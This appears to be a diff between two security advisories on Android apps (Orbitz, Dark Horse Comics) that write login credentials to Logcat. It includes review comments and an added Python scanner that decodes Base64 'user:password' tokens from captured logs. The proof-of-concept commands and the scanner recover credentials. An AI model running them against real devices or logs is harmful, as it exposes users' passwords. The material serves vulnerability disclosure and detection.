1 | - | # Exploit Title: Orbitz Android App - Username/Password Logging |
1 | + | # Title: Dark Horse Comics - Logging Sensitive Information |
2 | - | # Application: Orbitz |
2 | + | # Application: Dark Horse Comics |
3 | - | # Version: 19.31.1 |
3 | + | # Version: 1.3.21 |
4 | - | # Software Link: https://play.google.com/store/apps/details?id=com.orbitz |
4 | + | # Software Link: https://play.google.com/store/apps/details?id=com.darkhorse.digital |
5 | - | # Company: Orbitz |
5 | + | # Company: Dark Horse Comics |
6 | # Installs: 1,000,000+ | |
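Review bot: the header records only the affected build (`# Version: 1.3.21`), but the vendor-feedback section at line 17 says a fixed release was published; add the fixed version beside it (for example a `# Fixed in:` line) so a reader can tell whether an installed build is still affected. Minor: the `+` title drops the `Exploit Title:` field name the Orbitz version used; keep the field name consistent between the two advisories.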
7 | - | # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz |
7 | + | # Impact: hackers can get username and password of Dark Horse Comics, looking at the log. |
8 | # Category: Mobile Apps | |
9 | # Tested on: Android 9 | |
10 | ||
11 | ---Description--- | |
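Review bot: the new Impact line (line 7) is ungrammatical and misstates what is in the log: the PoC at lines 27-32 shows the credentials Base64-encoded, not in the clear, and the precondition is the ability to read Logcat (another app with log access, or a person with adb), not "hackers" in general. Suggested wording: `# Impact: Anyone who can read Logcat recovers the user's Dark Horse Comics username and password (Base64-encoded in the log).`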
12 | - | Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. |
12 | + | Dark Horse Comics, the popular comics app installed more than 1 million, stores a user token in Logcat. The user token is the Base64-encoded string from password and username, so by decoding it, hackers can obtain usernames and passwords of the app. |
13 | Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. | |
14 | ||
15 | ||
16 | ---Vendor feedback--- | |
17 | After reporting, the vendor has quickly fixed this problem and released a new version. | |
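Review bot: line 13 now opens with "Especially" but no longer follows the sentence it qualified: the old line 12 contained that same Jelly Bean sentence (duplicated in the Orbitz text), and the new line 12 drops it, so line 13 should be folded into the description, e.g. "... simply by reading Logcat. On Android versions before Jelly Bean any installed app could read Logcat, since READ_LOGS was a normal permission granted at install time." Also, "the Base64-encoded string from password and username" should state the format the PoC actually shows at line 32, `username:password`, which is the form of an HTTP Basic credential, so the logged token is the user's login credential verbatim. Finally, "installed more than 1 million" reads better as "with more than 1,000,000 installs", matching line 6.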
18 | - | 1. Try to login with Orbitz, entering username and password |
18 | + | |
19 | ---PoC--- | |
20 | - | 2. Search password in Logcat |
20 | + | 1. Try to log in Dark Horse Comics, Android app. |
21 | - | $ adb logcat | grep 'password' |
21 | + | - Opening Login UI |
22 | - | 08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1 |
22 | + | - Enter credentials. Fake information is enough for reproducing. |
23 | - | |
23 | + | |
24 | - | ---Reporter--- |
24 | + | 2. Search the token in the log |
25 | - | Jaeho Lee(Jaeho.Lee@rice.edu) |
25 | + | $ adb logcat | grep 'request with token' |
26 | ||
27 | 09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
28 | ||
29 | 3. Decoding base64 to get a username and password. | |
30 | $ base64 -d | |
31 | amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
32 | jaeho.lee@rice.edu:myfackpassword | |
33 | ||
34 | --Reporter--- | |
35 | Jaeho Lee (Jaeho.Lee@rice.edu) | |
36 | Rice Computer Security Lab | |
37 | Rice University |
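Review bot: step 3 (lines 30-32) shows `$ base64 -d` with the token on the following line, which a reader will paste as two separate commands; write it as one pipeline, `$ echo 'amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk' | base64 -d`, with the decoded `jaeho.lee@rice.edu:myfackpassword` shown as its output. Step 2's filter `grep 'request with token'` also depends on the exact message text; filtering on the tag (`adb logcat -s DarkHorse.DungeonHTTPClient`) survives wording changes. Since the log line at 27 is emitted at verbose (V) level and the app came from the Play Store link at line 4, it is worth stating explicitly that this message is present in the shipping build, because verbose logging is often assumed to be stripped from release builds.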
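An added example, not part of either advisory: a Python scanner that automates steps 2 and 3 of the PoC over saved `adb logcat` output. It goes beyond the single grep in the advisory: it parses threadtime-format lines, tries every Base64-looking run in each message, and reports only the runs that decode to a printable `user:password` pair, so the same leak is caught under a different tag or message wording. The log sample is constructed here (the second line is the one from the advisory; the `SomeTag` and `OkHttp` lines and the `example.invalid` URL are made up), and the function names are mine.

```python
import base64
import binascii
import re

# Constructed sample of `adb logcat` (threadtime format). Line 2 is the line
# from the advisory; the other lines are made up to show what the scanner
# ignores (plain text, Base64 without a colon, non-Base64 runs).
SAMPLE_LOGCAT = """\
09-16 23:44:30.991 13303 13303 I ActivityManager: Start proc 13303:com.darkhorse.digital/u0a123
09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk
09-16 23:44:31.140 13303 14813 D OkHttp: --> GET https://example.invalid/api/library
09-16 23:44:31.201 13303 14813 V DarkHorse.DungeonHTTPClient: cache key: aGVsbG8gd29ybGQ=
09-16 23:44:31.300 13303 14813 D SomeTag: session=dXNlcjpwYXNz
"""

# logcat threadtime line: date time pid tid level tag: message
LOGCAT_RE = re.compile(
    r"^(?P<date>\d\d-\d\d) (?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>[^:]+):\s(?P<msg>.*)$"
)

# Runs of Base64 alphabet long enough to hold a short "user:password" pair.
B64_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def decode_basic_credential(token):
    """Return (user, password) if token is Base64 of 'user:password', else None.

    This is the same encoding HTTP Basic authentication uses, which is why a
    logged "token" of this shape is the login credential itself.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None          # wrong length / padding: not a Base64 value
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None          # decodes to binary, e.g. an ordinary English word
    if ":" not in text or not text.isprintable():
        return None
    user, _, password = text.partition(":")
    if not user or not password:
        return None
    return user, password


def find_leaked_credentials(logcat_text, tags=None):
    """Scan logcat output for Base64-encoded 'user:password' tokens.

    tags: optional set of log tags to restrict the scan to (None = all tags).
    Returns one dict per hit with the tag, timestamp, raw token and the
    decoded user and password.
    """
    findings = []
    for line in logcat_text.splitlines():
        m = LOGCAT_RE.match(line)
        if not m:
            continue
        if tags is not None and m.group("tag") not in tags:
            continue
        for token in B64_RE.findall(m.group("msg")):
            cred = decode_basic_credential(token)
            if cred is None:
                continue
            findings.append({
                "timestamp": f'{m.group("date")} {m.group("time")}',
                "tag": m.group("tag"),
                "token": token,
                "user": cred[0],
                "password": cred[1],
            })
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_LOGCAT with open("logcat.txt").read() on a real capture.
    for hit in find_leaked_credentials(SAMPLE_LOGCAT):
        print(f'{hit["timestamp"]} {hit["tag"]}: {hit["user"]} / {hit["password"]}')
```

Feed it `adb logcat -d > logcat.txt` from a device where the login was attempted; a hit on any tag, not just `DarkHorse.DungeonHTTPClient`, means a credential pair reached the system log.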